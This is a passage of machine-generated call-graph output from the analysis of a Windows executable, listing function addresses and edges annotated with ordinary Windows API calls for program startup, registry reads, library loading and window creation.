95438->95439 95444 7ff7bb7f5976 95438->95444 95440 7ff7bb7f596d 95439->95440 95441 7ff7bb7f622b 95439->95441 95439->95444 95467 7ff7bb7f5990 95439->95467 95442 7ff7bb7f5a47 95440->95442 95440->95444 95441->95467 95476 7ff7bb7fe65c 36 API calls 95441->95476 95445 7ff7bb7f6355 95442->95445 95464 7ff7bb7f597f 95442->95464 95465 7ff7bb7f5bd6 95442->95465 95442->95467 95446 7ff7bb7f6449 95444->95446 95447 7ff7bb841ab5 95444->95447 95462 7ff7bb841aca 95444->95462 95444->95464 95449 7ff7bb7f6367 95445->95449 95445->95465 95450 7ff7bb7ed4cc 48 API calls 95446->95450 95447->95462 95447->95464 95469 7ff7bb7eef68 36 API calls 95449->95469 95454 7ff7bb7f6451 95450->95454 95451 7ff7bb841af3 95474 7ff7bb7efd6c 36 API calls 95451->95474 95458 7ff7bb7ed4cc 48 API calls 95454->95458 95456 7ff7bb7f636f 95470 7ff7bb7fe65c 36 API calls 95456->95470 95457 7ff7bb7efd6c 36 API calls 95457->95464 95461 7ff7bb7f645d 95458->95461 95460 7ff7bb7ed4cc 48 API calls 95460->95464 95472 7ff7bb801ad0 CompareStringW 95461->95472 95462->95467 95473 7ff7bb7efd6c 36 API calls 95462->95473 95464->95457 95464->95460 95464->95465 95464->95467 95471 7ff7bb801ad0 CompareStringW 95464->95471 95465->95467 95475 7ff7bb7efd6c 36 API calls 95465->95475 95467->95435 95468->95437 95469->95456 95470->95467 95471->95464 95472->95464 95473->95451 95474->95467 95475->95467 95476->95467 95477 7ff7bb83f890 95486 7ff7bb7ee18c 95477->95486 95479 7ff7bb83f8a9 95483 7ff7bb83f915 Concurrency::wait 95479->95483 95492 7ff7bb802ac0 CharUpperBuffW RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95479->95492 95481 7ff7bb83f8f6 95481->95483 95493 7ff7bb861464 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95481->95493 95484 7ff7bb8403e1 Concurrency::wait 95483->95484 95494 7ff7bb8634e4 77 API calls 3 library calls 95483->95494 95487 7ff7bb7ee1c2 95486->95487 95488 7ff7bb7ee1a7 95486->95488 95491 7ff7bb7ee1af 95487->95491 95496 7ff7bb7eee20 5 API calls Concurrency::wait 95487->95496 95495 7ff7bb7eee20 5 API calls Concurrency::wait 95488->95495 95491->95479 95492->95481 95494->95484 95495->95491 95496->95491 95497 7ff7bb7f2c17 95500 7ff7bb7f14a0 95497->95500 95499 7ff7bb7f2c2a 95501 7ff7bb7f14d3 95500->95501 95502 7ff7bb83be31 95501->95502 95504 7ff7bb83bdf2 95501->95504 95505 7ff7bb83bdd1 95501->95505 95532 7ff7bb7f14fa __scrt_fastfail 95501->95532 95548 7ff7bb878f48 300 API calls 3 library calls 95502->95548 95508 7ff7bb83be19 95504->95508 95546 7ff7bb879a88 300 API calls 4 library calls 95504->95546 95507 7ff7bb83bddb 95505->95507 95505->95532 95545 7ff7bb879514 300 API calls 95507->95545 95547 7ff7bb8634e4 77 API calls 3 library calls 95508->95547 95510 7ff7bb7f1884 95536 7ff7bb802130 45 API calls 95510->95536 95516 7ff7bb7f1a30 45 API calls 95516->95532 95517 7ff7bb7f1898 95517->95499 95524 7ff7bb802130 45 API calls 95524->95532 95525 7ff7bb83bfe4 95551 7ff7bb8793a4 77 API calls 95525->95551 95526 7ff7bb7f1799 95534 7ff7bb7f1815 95526->95534 95552 7ff7bb8634e4 77 API calls 3 library calls 95526->95552 95529 7ff7bb7f3c20 300 API calls 95529->95532 95530 7ff7bb7ee0a8 4 API calls 95530->95532 95532->95510 95532->95516 95532->95524 95532->95525 95532->95526 95532->95529 95532->95530 95532->95534 95535 7ff7bb7eef9c 46 API calls 95532->95535 95537 7ff7bb8020d0 45 API calls 95532->95537 95538 7ff7bb7e5af8 300 API calls 95532->95538 95539 7ff7bb805114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95532->95539 95540 7ff7bb8035c8 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95532->95540 95541 7ff7bb804f0c 34 API calls _onexit 95532->95541 95542 7ff7bb8050b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95532->95542 95543 7ff7bb8036c4 77 API calls 95532->95543 95544 7ff7bb8037dc 300 API calls 95532->95544 95549 7ff7bb7eee20 5 API calls Concurrency::wait 95532->95549 95550 7ff7bb84ac10 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95532->95550 95534->95499 95535->95532 95536->95517 95537->95532 95538->95532 95540->95532 95541->95532 95543->95532 95544->95532 95545->95534 95546->95508 95547->95502 95548->95532 95549->95532 95550->95532 95551->95526 95552->95526 95553 7ff7bb805328 95576 7ff7bb804cac 95553->95576 95556 7ff7bb805474 95609 7ff7bb8057e4 7 API calls __scrt_fastfail 95556->95609 95557 7ff7bb805344 95559 7ff7bb80547e 95557->95559 95561 7ff7bb805362 95557->95561 95610 7ff7bb8057e4 7 API calls __scrt_fastfail 95559->95610 95562 7ff7bb805387 95561->95562 95567 7ff7bb8053a4 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 95561->95567 95584 7ff7bb81ada4 95561->95584 95563 7ff7bb805489 abort 95565 7ff7bb80540d 95592 7ff7bb805930 95565->95592 95567->95565 95606 7ff7bb809204 35 API calls pair 95567->95606 95568 7ff7bb805412 95595 7ff7bb7e3730 95568->95595 95573 7ff7bb805435 95573->95563 95608 7ff7bb804e90 8 API calls 2 library calls 95573->95608 95575 7ff7bb80544c 95575->95562 95577 7ff7bb804cce __scrt_initialize_crt 95576->95577 95611 7ff7bb8065ec 95577->95611 95580 7ff7bb804cd7 95580->95556 95580->95557 95585 7ff7bb81ade0 95584->95585 95586 7ff7bb81adff 95584->95586 95585->95586 95660 7ff7bb7e1064 95585->95660 95665 7ff7bb7e1048 95585->95665 95670 7ff7bb7e10e8 95585->95670 95675 7ff7bb80def8 95585->95675 95684 7ff7bb7e1080 95585->95684 95586->95567 95904 7ff7bb806240 95592->95904 95596 7ff7bb7e3743 IsThemeActive 95595->95596 95597 7ff7bb7e37a3 95595->95597 95906 7ff7bb8092d0 95596->95906 95607 7ff7bb805974 GetModuleHandleW 95597->95607 95603 7ff7bb7e377d 95918 7ff7bb7e37b0 95603->95918 95605 7ff7bb7e3785 SystemParametersInfoW 95605->95597 95606->95565 95607->95573 95608->95575 95609->95559 95610->95563 95612 7ff7bb8065f5 __vcrt_initialize_winapi_thunks __vcrt_initialize 95611->95612 95624 7ff7bb807290 95612->95624 95615 7ff7bb804cd3 95615->95580 95619 7ff7bb81ac84 95615->95619 95617 7ff7bb80660c 95617->95615 95631 7ff7bb8072d8 DeleteCriticalSection 95617->95631 95621 7ff7bb824340 95619->95621 95620 7ff7bb804ce0 95620->95580 95623 7ff7bb806620 8 API calls 3 library calls 95620->95623 95621->95620 95648 7ff7bb81dd2c 95621->95648 95623->95580 95625 7ff7bb807298 95624->95625 95627 7ff7bb8072c9 95625->95627 95629 7ff7bb8065ff 95625->95629 95632 7ff7bb807614 95625->95632 95637 7ff7bb8072d8 DeleteCriticalSection 95627->95637 95629->95615 95630 7ff7bb807218 8 API calls 3 library calls 95629->95630 95630->95617 95631->95615 95638 7ff7bb807310 95632->95638 95635 7ff7bb807654 95635->95625 95636 7ff7bb80765f InitializeCriticalSectionAndSpinCount 95636->95635 95637->95629 95639 7ff7bb807371 95638->95639 95646 7ff7bb80736c try_get_function 95638->95646 95639->95635 95639->95636 95640 7ff7bb807454 95640->95639 95643 7ff7bb807462 GetProcAddress 95640->95643 95641 7ff7bb8073a0 LoadLibraryExW 95642 7ff7bb8073c1 GetLastError 95641->95642 95641->95646 95642->95646 95644 7ff7bb807473 95643->95644 95644->95639 95645 7ff7bb807439 FreeLibrary 95645->95646 95646->95639 95646->95640 95646->95641 95646->95645 95647 7ff7bb8073fb LoadLibraryExW 95646->95647 95647->95646 95659 7ff7bb81b9bc EnterCriticalSection 95648->95659 95650 7ff7bb81dd3c 95651 7ff7bb81e258 32 API calls 95650->95651 95652 7ff7bb81dd45 95651->95652 95653 7ff7bb81dd53 95652->95653 95654 7ff7bb81db44 34 API calls 95652->95654 95655 7ff7bb81ba10 _isindst LeaveCriticalSection 95653->95655 95656 7ff7bb81dd4e 95654->95656 95657 7ff7bb81dd5f 95655->95657 95658 7ff7bb81dc30 GetStdHandle GetFileType 95656->95658 95657->95621 95658->95653 95689 7ff7bb7e7ec0 95660->95689 95662 7ff7bb7e106d 95725 7ff7bb804ebc 34 API calls _onexit 95662->95725 95664 7ff7bb804f15 95664->95585 95774 7ff7bb7e7718 95665->95774 95669 7ff7bb804f15 95669->95585 95794 7ff7bb801d80 95670->95794 95674 7ff7bb804f15 95674->95585 95676 7ff7bb80df03 95675->95676 95819 7ff7bb81de20 95676->95819 95840 7ff7bb7e7920 95684->95840 95686 7ff7bb7e109e 95870 7ff7bb804ebc 34 API calls _onexit 95686->95870 95688 7ff7bb804f15 95688->95585 95726 7ff7bb7e82b4 95689->95726 95692 7ff7bb7e82b4 4 API calls 95693 7ff7bb7e7f3a 95692->95693 95694 7ff7bb7e9640 4 API calls 95693->95694 95695 7ff7bb7e7f46 95694->95695 95696 7ff7bb7e7cf4 4 API calls 95695->95696 95697 7ff7bb7e7f59 95696->95697 95733 7ff7bb802d5c 6 API calls 95697->95733 95699 7ff7bb7e7fa5 95700 7ff7bb7e9640 4 API calls 95699->95700 95701 7ff7bb7e7fb1 95700->95701 95702 7ff7bb7e9640 4 API calls 95701->95702 95703 7ff7bb7e7fbd 95702->95703 95704 7ff7bb7e9640 4 API calls 95703->95704 95705 7ff7bb7e7fc9 95704->95705 95706 7ff7bb7e9640 4 API calls 95705->95706 95707 7ff7bb7e800f 95706->95707 95708 7ff7bb7e9640 4 API calls 95707->95708 95709 7ff7bb7e80f7 95708->95709 95734 7ff7bb7fef88 95709->95734 95711 7ff7bb7e8103 95741 7ff7bb7feec8 95711->95741 95713 7ff7bb7e812f 95714 7ff7bb7e9640 4 API calls 95713->95714 95715 7ff7bb7e813b 95714->95715 95752 7ff7bb7f6d40 95715->95752 95719 7ff7bb7e81ac 95720 7ff7bb7e81be GetStdHandle 95719->95720 95721 7ff7bb7e8220 OleInitialize 95720->95721 95722 7ff7bb82d350 95720->95722 95721->95662 95769 7ff7bb85ffc8 CreateThread 95722->95769 95724 7ff7bb82d367 CloseHandle 95725->95664 95727 7ff7bb7e9640 4 API calls 95726->95727 95728 7ff7bb7e82c6 95727->95728 95729 7ff7bb7e9640 4 API calls 95728->95729 95730 7ff7bb7e82cf 95729->95730 95731 7ff7bb7e9640 4 API calls 95730->95731 95732 7ff7bb7e7f2e 95731->95732 95732->95692 95733->95699 95735 7ff7bb7e9640 4 API calls 95734->95735 95736 7ff7bb7fefa3 95735->95736 95737 7ff7bb7e9640 4 API calls 95736->95737 95738 7ff7bb7fefac 95737->95738 95739 7ff7bb7e9640 4 API calls 95738->95739 95740 7ff7bb7ff02e 95739->95740 95740->95711 95742 7ff7bb7feede 95741->95742 95743 7ff7bb7e9640 4 API calls 95742->95743 95744 7ff7bb7feeea 95743->95744 95745 7ff7bb7e9640 4 API calls 95744->95745 95746 7ff7bb7feef6 95745->95746 95747 7ff7bb7e9640 4 API calls 95746->95747 95748 7ff7bb7fef02 95747->95748 95749 7ff7bb7e9640 4 API calls 95748->95749 95750 7ff7bb7fef0e 95749->95750 95751 7ff7bb7fef68 RegisterWindowMessageW 95750->95751 95751->95713 95753 7ff7bb7f6db9 95752->95753 95760 7ff7bb7f6d80 95752->95760 95770 7ff7bb805114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95753->95770 95761 7ff7bb7e816b 95760->95761 95771 7ff7bb805114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95760->95771 95762 7ff7bb8039a8 95761->95762 95763 7ff7bb84a502 95762->95763 95768 7ff7bb8039cc 95762->95768 95772 7ff7bb7eee20 5 API calls Concurrency::wait 95763->95772 95765 7ff7bb84a50e 95773 7ff7bb7eee20 5 API calls Concurrency::wait 95765->95773 95767 7ff7bb84a52d 95768->95719 95769->95724 95772->95765 95773->95767 95775 7ff7bb7e9640 4 API calls 95774->95775 95776 7ff7bb7e778f 95775->95776 95783 7ff7bb7e6f24 95776->95783 95778 7ff7bb82d042 95780 7ff7bb7e782c 95780->95778 95781 7ff7bb7e1051 95780->95781 95786 7ff7bb7e7410 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95780->95786 95782 7ff7bb804ebc 34 API calls _onexit 95781->95782 95782->95669 95787 7ff7bb7e6f60 95783->95787 95786->95780 95788 7ff7bb7e6f85 95787->95788 95789 7ff7bb7e6f52 95787->95789 95788->95789 95790 7ff7bb7e6f93 RegOpenKeyExW 95788->95790 95789->95780 95790->95789 95791 7ff7bb7e6faf RegQueryValueExW 95790->95791 95792 7ff7bb7e6ff5 RegCloseKey 95791->95792 95793 7ff7bb7e6fdd 95791->95793 95792->95789 95793->95792 95795 7ff7bb7e9640 4 API calls 95794->95795 95796 7ff7bb801db2 GetVersionExW 95795->95796 95797 7ff7bb7e7cf4 4 API calls 95796->95797 95798 7ff7bb801dfc 95797->95798 95798->95798 95799 7ff7bb7edda4 4 API calls 95798->95799 95800 7ff7bb801e87 95798->95800 95799->95798 95801 7ff7bb7edda4 4 API calls 95800->95801 95806 7ff7bb801ea4 95801->95806 95802 7ff7bb849645 95803 7ff7bb84964f 95802->95803 95817 7ff7bb8532f4 LoadLibraryA GetProcAddress 95803->95817 95804 7ff7bb801f3c GetCurrentProcess IsWow64Process 95805 7ff7bb801f7e __scrt_fastfail 95804->95805 95805->95803 95808 7ff7bb801f86 GetSystemInfo 95805->95808 95806->95802 95806->95804 95809 7ff7bb7e10f1 95808->95809 95816 7ff7bb804ebc 34 API calls _onexit 95809->95816 95810 7ff7bb8496b1 95811 7ff7bb8496d7 GetSystemInfo 95810->95811 95812 7ff7bb8496b5 95810->95812 95813 7ff7bb8496bf 95811->95813 95818 7ff7bb8532f4 LoadLibraryA GetProcAddress 95812->95818 95813->95809 95815 7ff7bb8496f0 FreeLibrary 95813->95815 95815->95809 95816->95674 95817->95810 95818->95813 95838 7ff7bb81b9bc EnterCriticalSection 95819->95838 95841 7ff7bb7e7948 wcsftime 95840->95841 95842 7ff7bb7e9640 4 API calls 95841->95842 95843 7ff7bb7e7a02 95842->95843 95871 7ff7bb7e5680 95843->95871 95845 7ff7bb7e7a0c 95878 7ff7bb803a38 95845->95878 95848 7ff7bb7e71f8 4 API calls 95849 7ff7bb7e7a2c 95848->95849 95884 7ff7bb7e4680 95849->95884 95851 7ff7bb7e7a3d 95852 7ff7bb7e9640 4 API calls 95851->95852 95853 7ff7bb7e7a47 95852->95853 95888 7ff7bb7ea854 95853->95888 95856 7ff7bb82d05c RegQueryValueExW 95857 7ff7bb82d131 RegCloseKey 95856->95857 95858 7ff7bb82d08f 95856->95858 95860 7ff7bb7e7a83 Concurrency::wait 95857->95860 95868 7ff7bb82d147 wcscat Concurrency::wait 95857->95868 95859 7ff7bb804c68 4 API calls 95858->95859 95861 7ff7bb82d0b2 95859->95861 95860->95686 95862 7ff7bb82d0bf RegQueryValueExW 95861->95862 95864 7ff7bb82d0f3 95862->95864 95866 7ff7bb82d112 95862->95866 95863 7ff7bb7e9d84 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95863->95868 95865 7ff7bb7e7cf4 4 API calls 95864->95865 95865->95866 95866->95857 95867 7ff7bb7eec00 4 API calls 95867->95868 95868->95860 95868->95863 95868->95867 95869 7ff7bb7e4680 4 API calls 95868->95869 95869->95868 95870->95688 95892 7ff7bb828f90 95871->95892 95874 7ff7bb7eec00 4 API calls 95875 7ff7bb7e56b4 95874->95875 95894 7ff7bb7e56d4 95875->95894 95877 7ff7bb7e56c1 Concurrency::wait 95877->95845 95879 7ff7bb828f90 wcsftime 95878->95879 95880 7ff7bb803a44 GetFullPathNameW 95879->95880 95881 7ff7bb803a74 95880->95881 95882 7ff7bb7e7cf4 4 API calls 95881->95882 95883 7ff7bb7e7a1b 95882->95883 95883->95848 95885 7ff7bb7e469f 95884->95885 95887 7ff7bb7e46c8 memcpy_s 95884->95887 95886 7ff7bb804c68 4 API calls 95885->95886 95886->95887 95887->95851 95889 7ff7bb7ea87a 95888->95889 95890 7ff7bb7e7a51 RegOpenKeyExW 95888->95890 95891 7ff7bb804c68 4 API calls 95889->95891 95890->95856 95890->95860 95891->95890 95893 7ff7bb7e568c GetModuleFileNameW 95892->95893 95893->95874 95895 7ff7bb828f90 wcsftime 95894->95895 95896 7ff7bb7e56e9 GetFullPathNameW 95895->95896 95897 7ff7bb82c03a 95896->95897 95898 7ff7bb7e5712 95896->95898 95899 7ff7bb7ea854 4 API calls 95897->95899 95900 7ff7bb7e7cf4 4 API calls 95898->95900 95901 7ff7bb7e571c 95899->95901 95900->95901 95901->95901 95902 7ff7bb7edda4 4 API calls 95901->95902 95903 7ff7bb7e5785 95902->95903 95903->95877 95905 7ff7bb805947 GetStartupInfoW 95904->95905 95905->95568 95964 7ff7bb81b9bc EnterCriticalSection 95906->95964 95908 7ff7bb8092e4 95909 7ff7bb81ba10 _isindst LeaveCriticalSection 95908->95909 95910 7ff7bb7e376e 95909->95910 95911 7ff7bb809334 95910->95911 95912 7ff7bb80933d 95911->95912 95913 7ff7bb7e3778 95911->95913 95965 7ff7bb8155d4 15 API calls abort 95912->95965 95917 7ff7bb7e36e8 SystemParametersInfoW SystemParametersInfoW 95913->95917 95915 7ff7bb809342 95966 7ff7bb81b164 31 API calls _invalid_parameter_noinfo 95915->95966 95917->95603 95919 7ff7bb7e37cd wcsftime 95918->95919 95920 7ff7bb7e9640 4 API calls 95919->95920 95921 7ff7bb7e37dd GetCurrentDirectoryW 95920->95921 95967 7ff7bb7e57a0 95921->95967 95923 7ff7bb7e3807 IsDebuggerPresent 95924 7ff7bb7e3815 95923->95924 95925 7ff7bb82b872 MessageBoxA 95923->95925 95926 7ff7bb82b894 95924->95926 95927 7ff7bb7e3839 95924->95927 95925->95926 96077 7ff7bb7ee278 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95926->96077 96041 7ff7bb7e3f04 95927->96041 95931 7ff7bb7e3860 GetFullPathNameW 95932 7ff7bb7e7cf4 4 API calls 95931->95932 95933 7ff7bb7e38a6 95932->95933 96057 7ff7bb7e3f9c 95933->96057 95934 7ff7bb7e38bf 95936 7ff7bb82b8dc SetCurrentDirectoryW 95934->95936 95937 7ff7bb7e38c7 95934->95937 95936->95937 95938 7ff7bb7e38d0 95937->95938 96078 7ff7bb84d540 AllocateAndInitializeSid CheckTokenMembership FreeSid 95937->96078 96073 7ff7bb7e3b84 7 API calls 95938->96073 95942 7ff7bb82b8f8 95942->95938 95944 7ff7bb82b90c 95942->95944 95946 7ff7bb7e5680 6 API calls 95944->95946 95945 7ff7bb7e38da 95948 7ff7bb7e6258 46 API calls 95945->95948 95952 7ff7bb7e38ef 95945->95952 95947 7ff7bb82b916 95946->95947 95949 7ff7bb7eec00 4 API calls 95947->95949 95948->95952 95950 7ff7bb82b927 95949->95950 95953 7ff7bb82b930 95950->95953 95956 7ff7bb82b94d 95950->95956 95951 7ff7bb7e3913 95957 7ff7bb7e391f SetCurrentDirectoryW 95951->95957 95952->95951 95954 7ff7bb7e5d88 Shell_NotifyIconW 95952->95954 95955 7ff7bb7e71f8 4 API calls 95953->95955 95954->95951 95958 7ff7bb82b93c 95955->95958 95959 7ff7bb7e71f8 4 API calls 95956->95959 95960 7ff7bb7e3934 Concurrency::wait 95957->95960 96079 7ff7bb7e7c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 95958->96079 95962 7ff7bb82b963 GetForegroundWindow ShellExecuteW 95959->95962 95960->95605 95963 7ff7bb82b99f Concurrency::wait 95962->95963 95963->95951 95965->95915 95966->95913 95968 7ff7bb7e9640 4 API calls 95967->95968 95969 7ff7bb7e57d7 95968->95969 96080 7ff7bb7e9bbc 95969->96080 95971 7ff7bb7e57fe 95972 7ff7bb7e5680 6 API calls 95971->95972 95973 7ff7bb7e5812 95972->95973 95974 7ff7bb7eec00 4 API calls 95973->95974 95975 7ff7bb7e5823 95974->95975 96094 7ff7bb7e6460 95975->96094 95978 7ff7bb82c05e 96167 7ff7bb862948 95978->96167 95979 7ff7bb7e584e Concurrency::wait 95983 7ff7bb7ee0a8 4 API calls 95979->95983 95981 7ff7bb82c074 95982 7ff7bb82c081 95981->95982 95984 7ff7bb7e652c 63 API calls 95981->95984 96185 7ff7bb7e652c 95982->96185 95985 7ff7bb7e586a 95983->95985 95984->95982 95987 7ff7bb7eec00 4 API calls 95985->95987 95988 7ff7bb7e5888 95987->95988 95992 7ff7bb82c099 95988->95992 96120 7ff7bb7eeff8 95988->96120 95990 7ff7bb7e58ad Concurrency::wait 95991 7ff7bb7eec00 4 API calls 95990->95991 95993 7ff7bb7e58d7 95991->95993 95995 7ff7bb7e5ab4 4 API calls 95992->95995 95993->95992 95994 7ff7bb7eeff8 46 API calls 95993->95994 95997 7ff7bb7e58fc Concurrency::wait 95994->95997 95996 7ff7bb82c0e1 95995->95996 95998 7ff7bb7e5ab4 4 API calls 95996->95998 96000 7ff7bb7e9640 4 API calls 95997->96000 95999 7ff7bb82c103 95998->95999 96003 7ff7bb7e5680 6 API calls 95999->96003 96001 7ff7bb7e591f 96000->96001 96133 7ff7bb7e5ab4 96001->96133 96006 7ff7bb82c12b 96003->96006 96008 7ff7bb7e5ab4 4 API calls 96006->96008 96007 7ff7bb7e5941 96007->95992 96010 7ff7bb7e5949 96007->96010 96009 7ff7bb82c139 96008->96009 96011 7ff7bb7ee0a8 4 API calls 96009->96011 96012 7ff7bb808e28 wcsftime 37 API calls 96010->96012 96013 7ff7bb82c14a 96011->96013 96014 7ff7bb7e5958 96012->96014 96015 7ff7bb7e5ab4 4 API calls 96013->96015 96014->95996 96016 7ff7bb7e5960 96014->96016 96017 7ff7bb82c15b 96015->96017 96018 7ff7bb808e28 wcsftime 37 API calls 96016->96018 96021 7ff7bb7ee0a8 4 API calls 96017->96021 96019 7ff7bb7e596f 96018->96019 96019->95999 96020 7ff7bb7e5977 96019->96020 96022 7ff7bb808e28 wcsftime 37 API calls 96020->96022 96023 7ff7bb82c172 96021->96023 96024 7ff7bb7e5986 96022->96024 96025 7ff7bb7e5ab4 4 API calls 96023->96025 96026 7ff7bb7e59c6 96024->96026 96029 7ff7bb7e5ab4 4 API calls 96024->96029 96028 7ff7bb82c183 96025->96028 96026->96017 96027 7ff7bb7e59d3 96026->96027 96156 7ff7bb7edf90 96027->96156 96030 7ff7bb7e59a8 96029->96030 96031 7ff7bb7ee0a8 4 API calls 96030->96031 96033 7ff7bb7e59b5 96031->96033 96034 7ff7bb7e5ab4 4 API calls 96033->96034 96034->96026 96037 7ff7bb7ed670 5 API calls 96038 7ff7bb7e5a12 96037->96038 96038->96037 96039 7ff7bb7e5ab4 4 API calls 96038->96039 96040 7ff7bb7e5a60 Concurrency::wait 96038->96040 96039->96038 96040->95923 96042 7ff7bb7e3f29 wcsftime 96041->96042 96043 7ff7bb82ba2c __scrt_fastfail 96042->96043 96044 7ff7bb7e3f4b 96042->96044 96047 7ff7bb82ba4d GetOpenFileNameW 96043->96047 96045 7ff7bb7e56d4 5 API calls 96044->96045 96046 7ff7bb7e3f56 96045->96046 96529 7ff7bb7e3eb4 96046->96529 96049 7ff7bb7e3858 96047->96049 96050 7ff7bb82bab0 96047->96050 96049->95931 96049->95934 96051 7ff7bb7e7cf4 4 API calls 96050->96051 96053 7ff7bb82babc 96051->96053 96055 7ff7bb7e3f6c 96547 7ff7bb7e6394 96055->96547 96058 7ff7bb7e3fb6 wcsftime 96057->96058 96590 7ff7bb7e9734 96058->96590 96060 7ff7bb7e3fc4 96061 7ff7bb7e4050 96060->96061 96600 7ff7bb7e4d28 77 API calls 96060->96600 96061->95934 96063 7ff7bb7e3fd3 96063->96061 96601 7ff7bb7e4b0c 79 API calls Concurrency::wait 96063->96601 96065 7ff7bb7e3fe0 96065->96061 96066 7ff7bb7e3fe8 GetFullPathNameW 96065->96066 96067 7ff7bb7e7cf4 4 API calls 96066->96067 96068 7ff7bb7e4014 96067->96068 96069 7ff7bb7e7cf4 4 API calls 96068->96069 96070 7ff7bb7e4028 96069->96070 96071 7ff7bb82bac2 wcscat 96070->96071 96072 7ff7bb7e7cf4 4 API calls 96070->96072 96072->96061 96605 7ff7bb7e3d90 7 API calls 96073->96605 96075 7ff7bb7e38d5 96076 7ff7bb7e3cbc CreateWindowExW CreateWindowExW ShowWindow ShowWindow 96075->96076 96077->95934 96078->95942 96079->95956 96081 7ff7bb7e9be5 wcsftime 96080->96081 96082 7ff7bb7e7cf4 4 API calls 96081->96082 96083 7ff7bb7e9c1b 96081->96083 96082->96083 96092 7ff7bb7e9c4a Concurrency::wait 96083->96092 96191 7ff7bb7e9d84 96083->96191 96085 7ff7bb7e9d84 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 96085->96092 96086 7ff7bb7eec00 4 API calls 96087 7ff7bb7e9d4a 96086->96087 96089 7ff7bb7e4680 4 API calls 96087->96089 96088 7ff7bb7eec00 4 API calls 96088->96092 96091 7ff7bb7e9d57 Concurrency::wait 96089->96091 96090 7ff7bb7e4680 4 API calls 96090->96092 96091->95971 96092->96085 96092->96088 96092->96090 96093 7ff7bb7e9d21 96092->96093 96093->96086 96093->96091 96194 7ff7bb7e6d64 96094->96194 96097 7ff7bb7e649d 96099 7ff7bb7e64c0 96097->96099 96100 7ff7bb7e64ba FreeLibrary 96097->96100 96098 7ff7bb7e6d64 2 API calls 96098->96097 96198 7ff7bb8148e0 96099->96198 96100->96099 96103 7ff7bb7e64db LoadLibraryExW 96217 7ff7bb7e6cc4 96103->96217 96104 7ff7bb82c8f6 96105 7ff7bb7e652c 63 API calls 96104->96105 96107 7ff7bb82c8fe 96105->96107 96110 7ff7bb7e6cc4 3 API calls 96107->96110 96112 7ff7bb82c907 96110->96112 96111 7ff7bb7e6505 96111->96112 96113 7ff7bb7e6512 96111->96113 96239 7ff7bb7e67d8 96112->96239 96114 7ff7bb7e652c 63 API calls 96113->96114 96116 7ff7bb7e5846 96114->96116 96116->95978 96116->95979 96119 7ff7bb82c93f 96442 7ff7bb7f1a30 96120->96442 96122 7ff7bb7ef029 96123 7ff7bb83a7a8 96122->96123 96126 7ff7bb7ef040 96122->96126 96458 7ff7bb7eee20 5 API calls Concurrency::wait 96123->96458 96125 7ff7bb83a7bc 96127 7ff7bb804c68 4 API calls 96126->96127 96128 7ff7bb7ef066 96127->96128 96130 7ff7bb7ef08f 96128->96130 96457 7ff7bb7ef0ec RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 96128->96457 96453 7ff7bb7ef1bc 96130->96453 96132 7ff7bb7ef0c6 96132->95990 96134 7ff7bb7e5ae4 96133->96134 96135 7ff7bb7e5ac6 96133->96135 96137 7ff7bb7e7cf4 4 API calls 96134->96137 96136 7ff7bb7ee0a8 4 API calls 96135->96136 96138 7ff7bb7e592d 96136->96138 96137->96138 96139 7ff7bb808e28 96138->96139 96140 7ff7bb808e3f 96139->96140 96141 7ff7bb808ea4 96139->96141 96148 7ff7bb808e63 96140->96148 96460 7ff7bb8155d4 15 API calls abort 96140->96460 96462 7ff7bb808d98 35 API calls 2 library calls 96141->96462 96144 7ff7bb808ed6 96146 7ff7bb808ee2 96144->96146 96153 7ff7bb808ef9 96144->96153 96145 7ff7bb808e49 96461 7ff7bb81b164 31 API calls _invalid_parameter_noinfo 96145->96461 96463 7ff7bb8155d4 15 API calls abort 96146->96463 96148->96007 96150 7ff7bb808e54 96150->96007 96151 7ff7bb808ee7 96464 7ff7bb81b164 31 API calls _invalid_parameter_noinfo 96151->96464 96154 7ff7bb808ef2 96153->96154 96155 7ff7bb812c80 37 API calls wcsftime 96153->96155 96154->96007 96155->96153 96157 7ff7bb7edfac 96156->96157 96158 7ff7bb804c68 4 API calls 96157->96158 96159 7ff7bb7e59f5 96157->96159 96158->96159 96160 7ff7bb7ed670 96159->96160 96161 7ff7bb7ed698 96160->96161 96166 7ff7bb7ed6a2 96161->96166 96465 7ff7bb7e880c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 96161->96465 96164 7ff7bb839d43 96165 7ff7bb7ed7de 96165->96038 96166->96165 96466 7ff7bb7eee20 5 API calls Concurrency::wait 96166->96466 96168 7ff7bb8629c8 96167->96168 96467 7ff7bb862b70 96168->96467 96171 7ff7bb7e67d8 45 API calls 96172 7ff7bb862a03 96171->96172 96173 7ff7bb7e67d8 45 API calls 96172->96173 96174 7ff7bb862a23 96173->96174 96175 7ff7bb7e67d8 45 API calls 96174->96175 96176 7ff7bb862a49 96175->96176 96177 7ff7bb7e67d8 45 API calls 96176->96177 96178 7ff7bb862a6d 96177->96178 96179 7ff7bb7e67d8 45 API calls 96178->96179 96180 7ff7bb862ac5 96179->96180 96181 7ff7bb86240c 32 API calls 96180->96181 96182 7ff7bb862ada 96181->96182 96184 7ff7bb8629de 96182->96184 96472 7ff7bb861d48 96182->96472 96184->95981 96186 7ff7bb7e6542 96185->96186 96187 7ff7bb7e653d 96185->96187 96189 7ff7bb7e656f FreeLibrary 96186->96189 96190 7ff7bb7e6558 96186->96190 96188 7ff7bb814970 62 API calls 96187->96188 96188->96186 96189->96190 96190->95992 96192 7ff7bb7ea7c0 4 API calls 96191->96192 96193 